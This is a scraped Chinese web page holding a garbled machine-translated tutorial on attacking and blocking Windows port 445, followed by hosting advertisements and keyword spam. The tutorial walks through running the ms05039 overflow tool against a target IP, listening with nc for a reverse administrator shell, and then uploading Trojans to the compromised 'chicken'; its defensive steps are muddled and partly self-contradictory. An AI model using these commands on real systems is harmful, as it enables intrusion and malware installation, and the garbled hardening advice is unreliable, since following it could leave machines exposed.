端口445端口(445 port)

445端口  时间:2021-04-18  阅读:()

445端口 445 port

Teach you 445 port attacks and prevention:

The 445 port is a port to get both praise and blame it, we caneasily access a variety of LAN in a shared folder or printersharing, but it is also because of it, hackers have a chance,they can pass through the port secretly sharing your hard drive,or even fall in your hard disk will be silent! What we can dois to think of away that hackers can take advantage of, blockingthe 445 port holes. For simplicity, in this paper, we takeWindows 2000 as an example, for Windows XP, the steps arebasically similar.

In the first step, what we need to do is to identify ahost with445 port vulnerabilities. You can scan it with scanning tools!SUPERSCAN, for example, is a port scanning tool.

The second step, assuming that we now have a host with a 445port vulnerability, we can use the Swiss Army knife NC and theoverflow tool ms05039 to attack:

F:\445>ms05039 target IP local IP 1234

. . . . . .

. . . . . .

F:\445>nc. exe -vv -l -p 1234

. . . . . .

. . . . . .

If you succeed, you will return to a shell, and then you canuse our usual commands. For example, let him download our Trojanhorse or upload a Trojan horse to him, and then run, so get achicken.

Do you think your computer is dangerous?Don't be afraid. Herewe are to remove this dangerous 445 port vulnerability:Attack methods against 445 port vulnerabilities:

1. port exclusion method

This method uses the port exclusion function of Windows 2000system, all packets from the 445 port will be banned

The evil guys can't get close to your mainframe, and here' s theconcrete implementation of this approach:

Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;

In the next window, right-click the "Internet connection" icon,select the "attribute" option, and then pop up the Internetconnection property window;

Open the "regular" tab page, select the "Internet Protocol"(TCP/IP) item, and then click the "property" button to open the

Internet (TCP/IP) property settings page;

Click the page in the "advanced" button, open the advancedTCP/IP settings window, select the "options" label, and labelsin the pages of the "optional settings", "TCP/IP screen" isselected, and then click the "properties" button, open the TCP/IP screening set port;

The 445 port belongs to a TCP port, you can set at thecorresponding port "TCP", will "allow only" of selectedactivation following the "add" button, click the button in thewindow open by the add filter ", the service port number willmust be used, add come in, and will be less than the 445 portnumber excluded, after setting, click"OK"button, you can maketo take effect.

2. service shutdown method

Taking into account the folder or printer sharing service willuse to port 445, so directly to the folder or printer sharingservice stop, canalso realize the closure of 445 port to allowhackers to destroy all kinds of shared resources, the followingare the specific steps to close the folder or printer sharingservice:

Open the start menu of the Windows 2000 system, select the"network and dial up connection" icon under the "Settings" item,right-click it, and click "Browse" command from the shortcutmenu;

In the next window, right-click the "Internet connection" icon,

select the "attribute" option, and then pop up the Internetconnection property window;

Open the "regular" tab page,

And in"this connectionuses the following selected components"list box, the "Microsoft network file or printer sharing"option before the cancellation number canceled, as shown infigure 2. Finally, click the "OK"button to restart the system,and the "big villains" on Internet have no access to all kindsof shared resources.

Of course, you can not stop sharing service conditions,deprivedof"sharedaccess rights are thewicked"; use the localsecurity settings in the user rights assignment function,specify anyusers on Internet have the right to access the localhost specific steps:

In the Windows 2000 start menu system, click the "program" and"management tools" and "local security settings" option, andthen expand the security settings "and" local policy "" userrights assignment "folder in the corresponding right sub windowto select"deny access to this computer from the network"option,and with the mouse left click on the;

Open the settings window, click the Add button, the pop-up"select auser or group dialog box, select the" everyone"option,and then click the Add button, finally click" OK", so that anyone user can access from the network to the local host.First look for chickens with MS05-039 vulnerabilities, and the

bugs open 445 and 139 ports,

Scan with a scanner

Next, exploit a vulnerability tool to attack a remotecalculator

Open the command prompt and enter ms05039. exe 192. 168.0.3

192. 168.0. 2 44661

Mean: 192. 168.0. 3 chicken IP address, 192. 168.0.2 is the localIP address, 4466 successful remote computing data overflowchicken will be connected to port 4466 on the local computer,1 on behalf of the remote chicken is Chinese version, Englishset 0. When successful execution of remote data overflowoperation, there will be a hint of successful overflow, suchas:

Trying to connect to remote port on 192. 168.0.3:445. . .ESTABLI SHED

Maki ng, nul l, se ssi on. . . OK

Trying, to, bind, pipe. . . OK

Trying, to, send, craf ted, packet. . . OK

Exploit done! Check your reverse shell on 192. 168.0.2:4466When the overflow is successful, immediately use NC (called theSwiss Army knife) to monitor the data that bounces back to the

4466 port of the machine.

Restart a command prompt, enter the command: NC -vv (two V) -l-p 4466 for data monitoring,

It will soon be able to monitor a remote SHELL withadministrator privileges.

So far, it has successfully entered the remote chicken system.At this time, you can upload Trojan horses through FTP, TFTP,etc.

HostKvm($4.25/月)俄罗斯/香港高防VPS

HostKvm又上新了,这次上架了2个线路产品:俄罗斯和香港高防VPS,其中俄罗斯经测试电信CN2线路,而香港高防VPS提供30Gbps攻击防御。HostKvm是一家成立于2013年的国外主机服务商,主要提供基于KVM架构的VPS主机,可选数据中心包括日本、新加坡、韩国、美国、中国香港等多个地区机房,均为国内直连或优化线路,延迟较低,适合建站或者远程办公等。俄罗斯VPSCPU:1core内存:2G...

RAKsmart秒杀服务器$30/月,洛杉矶/圣何塞/香港/日本站群特价

RAKsmart发布了9月份优惠促销活动,从9月1日~9月30日期间,爆款美国服务器每日限量抢购最低$30.62-$46/月起,洛杉矶/圣何塞/香港/日本站群大量补货特价销售,美国1-10Gbps大带宽不限流量服务器低价热卖等。RAKsmart是一家华人运营的国外主机商,提供的产品包括独立服务器租用和VPS等,可选数据中心包括美国加州圣何塞、洛杉矶、中国香港、韩国、日本、荷兰等国家和地区数据中心(...

腾讯云爆款秒杀:1C2G5M服务器38元/年,CDN流量包6元起

农历春节将至,腾讯云开启了热门爆款云产品首单特惠秒杀活动,上海/北京/广州1核2G云服务器首年仅38元起,上架了新的首单优惠活动,每天三场秒杀,长期有效,其中轻量应用服务器2G内存5M带宽仅需年费38元起,其他产品比如CDN流量包、短信包、MySQL、直播流量包、标准存储等等产品也参与活动,腾讯云官网已注册且完成实名认证的国内站用户均可参与。活动页面:https://cloud.tencent.c...

445端口为你推荐
2019年全国职业院校技能大赛!圈i申国电子政务发展调查报告测试ios包过滤防火墙和灵巧网关设置photoshop技术ps几大关键技术?ipad连不上wifiiPad 连不上Wifi,显示无互联网连接itunes备份itunes 里面的资料如何备份?ipad上网为什么我的ipad 显示无法连接到网络用itunes备份iphone怎么从itunes备份恢复google分析google分析打不开了?
全能虚拟主机 cc域名 政务和公益机构域名注册管理中心 南通服务器租用 flashfxp怎么用 securitycenter t牌 韩国俄罗斯 z.com 表格样式 正版win8.1升级win10 panel1 ibox官网 刀片服务器是什么 cdn联盟 亚马逊香港官网 申请网页 Updog 免费mysql数据库 百度云加速 更多